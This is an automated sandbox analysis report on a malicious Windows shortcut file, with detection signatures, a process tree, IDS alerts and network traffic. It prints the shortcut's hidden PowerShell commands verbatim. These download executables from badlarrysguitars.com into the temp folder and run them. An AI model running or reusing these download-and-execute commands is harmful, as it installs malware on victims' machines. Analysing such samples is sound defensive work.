Windows Analysis Report
IFhqcKaIol.lnk

Overview

General Information

Sample name: IFhqcKaIol.lnk (renamed because original name is a hash value)
Original sample name: 7d85db4c15db793280a65ddf0f1713e88f62f0eb87f00a4b4b6c3431eff4ccb9.lnk
Analysis ID: 1570131
MD5: 5ca10c53b0ae072b40f7f69b58e9d43e
SHA1: 268367cfec3f452fbd7f33a4a00bc5cc1950a679
SHA256: 7d85db4c15db793280a65ddf0f1713e88f62f0eb87f00a4b4b6c3431eff4ccb9
Tags: badlarrysguitars-com, lnk, user-JAMESWT_MHT

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for dropped file
Powershell drops PE file
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • powershell.exe (PID: 7372 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -Uri https://badlarrysguitars.com/share/drp.exe -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • nthelper.exe (PID: 7808 cmdline: "C:\Users\user\AppData\Local\Temp\nthelper.exe" MD5: 1CEB5D0CB063290C1F66FCCFED96A220)
        • powershell.exe (PID: 7820 cmdline: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf") MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Acrobat.exe (PID: 8020 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
            • AcroCEF.exe (PID: 1104 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
              • AcroCEF.exe (PID: 3796 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1640,i,16748263348592557741,8757425967150341878,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • powershell.exe (PID: 3400 cmdline: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe") MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 2856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 1484 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", ProcessId: 7372, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", ProcessId: 7372, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", ProcessId: 7372, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2592, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden", ProcessId: 7372, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1484, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-06T15:42:04.041665+0100 | 2019714 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49706 | 101.99.75.174 | 443 | TCP

AV Detection

Source: IFhqcKaIol.lnk, ReversingLabs: Detection: 21%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.1% probability
Source: C:\Users\user\AppData\Local\Temp\nthelper.exe, Joe Sandbox ML: detected
Source: unknown, HTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.11:49706 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.11:49717 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.11:49794 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: Joe Sandbox View, IP Address: 3.219.243.226
Source: Joe Sandbox View, ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic, Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.11:49706 -> 101.99.75.174:443
Source: global traffic, HTTP traffic detected:
  GET /share/drp.exe HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
  Host: badlarrysguitars.com
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET /share/alert.pdf HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
  Host: badlarrysguitars.com
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  OPTIONS /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1
  Host: p13n.adobe.io
  Connection: keep-alive
  Accept: */*
  Access-Control-Request-Method: GET
  Access-Control-Request-Headers: x-adobe-uuid,x-adobe-uuid-type,x-api-key
  Origin: https://rna-resource.acrobat.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
  Sec-Fetch-Mode: cors
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Dest: empty
  Referer: https://rna-resource.acrobat.com/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global traffic, HTTP traffic detected:
  GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1
  Host: p13n.adobe.io
  Connection: keep-alive
  sec-ch-ua: "Chromium";v="105"
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
  Accept: application/json, text/javascript, */*; q=0.01
  x-adobe-uuid: 14bb0f07-155a-4922-8830-76ed60af57ca
  x-adobe-uuid-type: visitorId
  x-api-key: AdobeReader9
  sec-ch-ua-platform: "Windows"
  Origin: https://rna-resource.acrobat.com
  Accept-Language: en-US,en;q=0.9
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Referer: https://rna-resource.acrobat.com/
  Accept-Encoding: gzip, deflate, br
Source: global traffic, HTTP traffic detected:
  GET /private/nois.exe HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
  Host: badlarrysguitars.com
  Connection: Keep-Alive
Source: unknown, TCP traffic detected without corresponding DNS query: 3.219.243.226
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: badlarrysguitars.com
Source: global traffic, DNS traffic detected: DNS query: x1.i.lencr.org
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE02A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D781924000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://badlarrysguitars.com
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 0000000A.00000002.2572831859.00000203F2A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: svchost.exe, 0000000A.00000003.1444813166.00000203F2920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000000.00000002.1360669295.000002F19007D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360669295.000002F1901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1337224669.000002F1819C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1527872976.00000207DC771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE0D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1527872976.00000207DC8B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1620609126.000001D7901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D781963000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1620609126.000001D790071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2710415892.000001DA901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2710415892.000001DA90074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000012.00000002.2570641775.000001DA802A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1337224669.000002F180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2570641775.000001DA80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1337224669.000002F181465000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000012.00000002.2570641775.000001DA802A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1397020503.00000207CE053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE059000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000006.00000002.1647494860.000001D7FC960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.1337224669.000002F180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2570641775.000001DA80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.1397020503.00000207CDFE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D781632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2570641775.000001DA802A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://badlarrysguitars.com
Source: powershell.exe, 00000012.00000002.2570641775.000001DA80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2727025853.000001DAFA7E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://badlarrysguitars.com/private/nois.exe
Source: powershell.exe, 00000012.00000002.2723434855.000001DAFA54F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2727333636.000001DAFA820000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2734761731.000001DAFC6F8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2723434855.000001DAFA530000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2723434855.000001DAFA623000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2727025853.000001DAFA7E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://badlarrysguitars.com/private/nois.exe-OutFile(Join-Path(
Source: powershell.exe, 00000006.00000002.1631103048.000001D7FA7C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D781632000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://badlarrysguitars.com/share/alert.pdf
Source: powershell.exe, 00000006.00000002.1647699924.000001D7FCB31000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1634579286.000001D7FAA40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1637567333.000001D7FC7B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1635286137.000001D7FC2E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1631103048.000001D7FA7C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://badlarrysguitars.com/share/alert.pdf-OutFile(Join-Path(
Source: powershell.exe, 00000003.00000002.1397020503.00000207CC701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CDFE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1394439368.00000207CC55C000.00000004.00000020.00020000.00000000.sdmp, IFhqcKaIol.lnk String found in binary or memory: https://badlarrysguitars.com/share/drp.exe
Source: powershell.exe, 00000003.00000002.1389284394.00000207CA920000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1391387666.00000207CA9A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1392944424.00000207CAC10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1394439368.00000207CC55C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1547715754.00000207E4BCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://badlarrysguitars.com/share/drp.exe-OutFile(Join-Path(
Source: powershell.exe, 00000003.00000002.1391387666.00000207CA9A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://badlarrysguitars.com/share/drp.exeel
Source: powershell.exe, 00000012.00000002.2710415892.000001DA90074000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
